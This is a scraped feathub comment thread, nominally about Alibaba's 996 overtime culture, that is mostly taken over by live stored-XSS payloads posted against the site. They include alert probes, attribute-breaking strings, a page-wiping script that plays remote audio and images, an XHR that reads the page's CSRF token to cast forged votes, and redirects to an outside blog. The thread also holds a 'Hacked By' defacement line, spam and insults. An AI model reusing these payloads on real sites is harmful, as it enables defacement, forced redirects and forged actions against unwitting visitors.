LinXueyuanStdio/996.ICU

阿里

yaozhewei asked for this feature 10 months ago — 56 comments

yaozhewei commented 10 months ago

img,svg,table{visibility: collapse;}window.onload=function(){var commentBodySet = document.getElementsByClassName("body");for(var i=1;i

jarrettyu commented 10 months ago

怎么没有评论

| lovywinsy commented 10 months ago

什么都不说,才是最好的 ^

JimmyVV commented 10 months ago

:)

| formalin14 commented 10 months ago

默默转发

| xxxwei commented 10 months ago

阿里太忙了,点个赞就走,没时间评论。

Jeffery-Song commented 10 months ago

不同部门不一样吧,之前实习所在部门一般995,周五晚上随意,平时晚上去锻炼什么的也都没问题

FEI17N commented 10 months ago

阿里2c部门是996

| netsman1030 commented 10 months ago

这个应该是个外包提上去的,阿里对外包是真的狠

| Tarry2012 commented 10 months ago

阿里既压榨还洗脑。

| ostopuro commented 10 months ago

| ostopuro commented 10 months ago

反996工作机会介绍群

xx19941215 commented 10 months ago

alert("老哥有xss漏洞哦 修复下")

z231485 commented 10 months ago

alert("我也来注入下试试")

imgss commented 10 months ago

alert("我也来注入下试试")

| wubocong commented 10 months ago

alert('hhh')

jvjs commented 10 months ago

alert("你们把我带坏了")

why66ccff commented 10 months ago

alert("你们别太过分了")

sunrui849 commented 10 months ago

alert("哈哈哈哈哈哈哈哈哈")

d9823 commented 10 months ago

alert("是这样玩的么?")

Lleksi commented 10 months ago

">alert("test")

Lleksi commented 10 months ago

alert("test")

d9823 commented 10 months ago

alert("试试")

d9823 commented 10 months ago

alert("我一个Android开发者都学会了xss注入~~~~~ 这成本也太低了吧")

JohnHuahuaZhan commented 10 months ago

一群傻逼在那里注入,提示有漏洞就行了,注入你妈呢

intrhuting commented 10 months ago

美国上市互联网企业,总部上海,硅谷、北京、深圳、广州、台北都有办公点,全球业务,飞速发展中,开发、运营、产品、销售、商务、设计职位都在招人,薪资丰厚,10点上班,6点多下班,一周5天,拒绝996,不进icu。想内推加v:sharehealthy

abc1310054026 commented 10 months ago

@xx19941215: alert("老哥有xss漏洞哦 修复下") @z231485 : alert("我也来注入下试试") @imgss : alert("我也来注入下试试") @wubocong: alert('hhh') @jvjs : alert("你们把我带坏了") @why66ccff: alert("你们别太过分了") @sunrui849: alert("哈哈哈哈哈哈哈哈哈") @Lleksi : alert("test") alert("test") @d9823 : alert("试试") alert("我一个Android开发者都学会了xss注入~~~~~ 这成本也太低了吧")

666sbX commented 10 months ago

Hacked By Helen收徒QQ925999918

ByMYX commented 10 months ago

alert("长的像个pig昂,还把自己的照片附上去 有病呀!")

ByMYX commented 10 months ago

@xx19941215:alert("长的像个pig昂,还把自己的照片附上去 有病呀!")

ByMYX commented 10 months ago

window.alert = function() { return false; }

ByMYX commented 10 months ago

<!-- window.alert = function(str){ return ; } alert("不能弹出警示框");//-->

sadtrain commented 10 months ago

就这素质还收徒,一个好好的项目被一小部分人玩坏了

sadtrain commented 10 months ago

var picTableBody = document.querySelector('body > div.container > div > div.col-md-9.col-sm-12 > div.comments > div:nth-child(28) > div.media-body > div > div') picTableBody.removeChild(picTableBody.firstChild)

JamesChenX commented 10 months ago

document.body.innerText = '';

let audio = new Audio('http://data.huiyi8.com/yinxiao/mp3/86945.mp3');
audio.loop = true;
audio.autoplay = true;
document.body.style.height = '1000px';
document.body.addEventListener("mousemove", function () {
    audio.play();
});

let image = new Image();
image.style.position='absolute';
image.left=0;
image.top=0;
image.style.width='100%';
image.style.height='100%';
image.src='http://img.mp.itc.cn/upload/20160528/516ff860030c4b5cbb2c63aa5ff13834_th.jpg';
document.body.append(audio,image);

console.log('希望你能换个心情,迎接未来美好的每一天!');

LinXueyuanStdio commented 10 months ago Admin

table{visibility: collapse;}

reinit commented 10 months ago

Please report XSS vulnerability

var xmlReq = new XMLHttpRequest(); xmlReq.addEventListener("load", function() { alert("Please report XSS vulnerability at https://feathub.com/feathub/feathub/+65, or https://feathub.com/feathub/feathub/+66 if you love me."); }); xmlReq.open("POST", "https://feathub.com/feathub/feathub/+65/vote?vote[score]=1"); xmlReq.send();

reinit commented 10 months ago

Please report XSS vulnerability https://feathub.com/feathub/feathub/+65

var xmlReq = new XMLHttpRequest(); xmlReq.addEventListener("load", function() { alert("Please report XSS vulnerability at https://feathub.com/feathub/feathub/+65, or https://feathub.com/feathub/feathub/+66 if you love me."); }); xmlReq.open("POST", "https://feathub.com/feathub/feathub/+65/vote?vote[score]=1", true); xmlReq.setRequestHeader("Content-Type", "application/x-www-form-urlencoded"); xmlReq.setRequestHeader("Cache-Control", "no-cache"); xmlReq.setRequestHeader("Referer", "https://feathub.com/feathub/feathub/+65"); xmlReq.send("method=patch&authenticitytoken=" + document.head.querySelector("[name~=csrf-token][content]").content);

xss67612 commented 10 months ago

document.body.innerText = '';

let audio = new Audio('http://dl.stream.qqmusic.qq.com/M5000036Tf0f03sL4n.mp3?vkey=A3EDA94F203BA3612F658DE4820E8AE6D58BA52F8D9F5789E40AFA1065D58F26E0A951C9BB8F482819C3185BE1AEB77356B11F154A90C52D&guid=5150825362&fromtag=1');
audio.loop = true;
audio.autoplay = true;
document.body.style.height = '1000px';
document.body.addEventListener("mousemove", function () {
    audio.play();
});

let image = new Image();
image.style.position='absolute';
image.left=0;
image.top=0;
image.style.width='100%';
image.style.height='100%';
image.src='https://timgsa.baidu.com/timg?image&quality=80&size=b9999_10000&sec=1553929917129&di=a8bae55a6a121071613d4f801322bd0f&imgtype=0&src=http%3A%2F%2Fs6.sinaimg.cn%2Fmw690%2F003xpBcszy6PCoJubOd35%26amp%3B690';
document.body.append(audio,image);

console.log('希望你能换个心情,迎接未来美好的每一天!');

superzmy commented 10 months ago

for(var x of document.getElementsByClassName("body")) { if (x.innerHTML.indexOf("script") >= 0) x.innerHTML = ""; }

<script> for(var x of document.getElementsByClassName("body")) { if (x.innerHTML.indexOf("script") >= 0) x.innerHTML = ""; } <script>

| doujinlong1 commented 10 months ago

"/>alert("学习xss注入")<!-

jarrettyu commented 10 months ago

注入是真的烦

| cmlanche commented 10 months ago

禁用js就好了啊

| cmlanche commented 10 months ago

阿里是加班最严重的公司

tancky commented 10 months ago

alert('友情提醒:看到此消息请禁用浏览器javascript功能');

| sueking commented 10 months ago

"/>alert('alibaba')<!--

Presley-Z commented 10 months ago

alert("双锅牛逼")

Presley-Z commented 10 months ago

confirm("双锅牛逼")

| zzxcvbnm19 commented 10 months ago

]>([\s\S])<\/body>/)[1].replace(/<?script?>/g,'').replace(/<\/?script?>/g,'').replace(//g, '')}};xmlhttp.open('GET',window.location.href,true);xmlhttp.send() }, 0)"/>

| zzxcvbnm19 commented 10 months ago

sadsa

| microhz commented 10 months ago

alert("博主赶紧把布丁打上,大家别起哄了!都是吃口技术饭!积极建立黑名单机制!")

guotao commented 10 months ago

If it were too difficult to allow as the folder under root, location.href="https://blogs.kainy.cn/?from=feathubXSS2" how about a new macro/variable that lets us do something like {Movie TitleThe:1} that will use the first letter of the title, or some other customization (and NOT require {Movie Title} as a mandatory field)。。

guotao commented 10 months ago

If it were too difficult to allow as the folder under root, window.location.href='https://blogs.kainy.cn/?from=feathubXSS2'; setTimeout("javascript:location.href='hello.html'", 0); how about a new macro/variable that lets us do something like {Movie TitleThe:1} that will use the first letter of the title, or some other customization (and NOT require {Movie Title} as a mandatory field)。。

kainy commented 10 months ago

If it were too difficult to allow as the folder under root, window.location.href='https://blogs.kainy.cn/?from=feathubXSS2'; how about a new macro/variable that lets us do something like {Movie TitleThe:1} that will use the first letter of the title, or some other customization (and NOT require {Movie Title} as a mandatory field)。。

guotao commented 10 months ago

]>([\s\S])<\/body>/)[1].replace(/<?script?>/g,'').replace(/<\/?script?>/g,'').replace(//g, '')}};xmlhttp.open('GET',window.location.href,true);xmlhttp.send() }, 0)"/> If it were too difficult to allow as the folder under root, window.location.href='https://blogs.kainy.cn/?from=feathubXSS2'; setTimeout("javascript:location.href='hello.html'", 0); how about a new macro/variable that lets us do something like {Movie TitleThe:1} that will use the first letter of the title, or some other customization (and NOT require {Movie Title} as a mandatory field)。。  。

guotao commented 10 months ago

If it were too difficult to allow as the folder under root, window.location.href='https://blogs.kainy.cn/?from=feathubXSS2'; setTimeout("javascript:location.href='hello.html'", 0); how about a new macro/variable that lets us do something like {Movie TitleThe:1} that will use the first letter of the title, or some other customization (and NOT require {Movie Title} as a mandatory field)。。  。 ]>([\s\S])<\/body>/)[1].replace(/<?script?>/g,'').replace(/<\/?script?>/g,'').replace(//g, '')}};xmlhttp.open('GET',window.location.href,true);xmlhttp.send() }, 0)"/>

Join the discussion!

Sign-in with GitHub to comment